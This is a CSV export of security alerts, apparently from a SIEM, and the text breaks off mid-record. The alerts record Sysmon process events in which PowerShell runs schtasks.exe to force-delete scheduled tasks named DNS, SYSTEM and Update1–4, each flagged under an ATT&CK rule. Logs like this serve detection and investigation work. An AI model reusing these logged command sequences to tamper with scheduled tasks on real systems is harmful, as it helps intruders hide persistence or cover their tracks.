-NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.654260400Z"",""eventRecordID"":""3066"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.651\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010091a2700}\r\nProcessId: 7780\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.651"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010091a2700}"",""processId"":""7780"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.541",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.612 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b182700} +ProcessId: 5996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.633290900Z"",""eventRecordID"":""3065"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.612\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b182700}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.612"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00107b182700}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.513",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.585 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ce162700} +ProcessId: 2644 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.588290400Z"",""eventRecordID"":""3064"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.585\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ce162700}\r\nProcessId: 2644\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.585"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010ce162700}"",""processId"":""2644"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.494",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.554 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f3142700} +ProcessId: 7580 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.559697500Z"",""eventRecordID"":""3063"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.554\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f3142700}\r\nProcessId: 7580\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.554"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010f3142700}"",""processId"":""7580"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.478",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.521 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f6122700} +ProcessId: 7776 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.524591700Z"",""eventRecordID"":""3062"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.521\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f6122700}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.521"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010f6122700}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.462",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.487 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001023112700} +ProcessId: 5956 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.492464100Z"",""eventRecordID"":""3061"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.487\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001023112700}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.487"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001023112700}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.448",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.456 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00104d0f2700} +ProcessId: 7296 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.460000700Z"",""eventRecordID"":""3060"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.456\r\nProcessGuid: 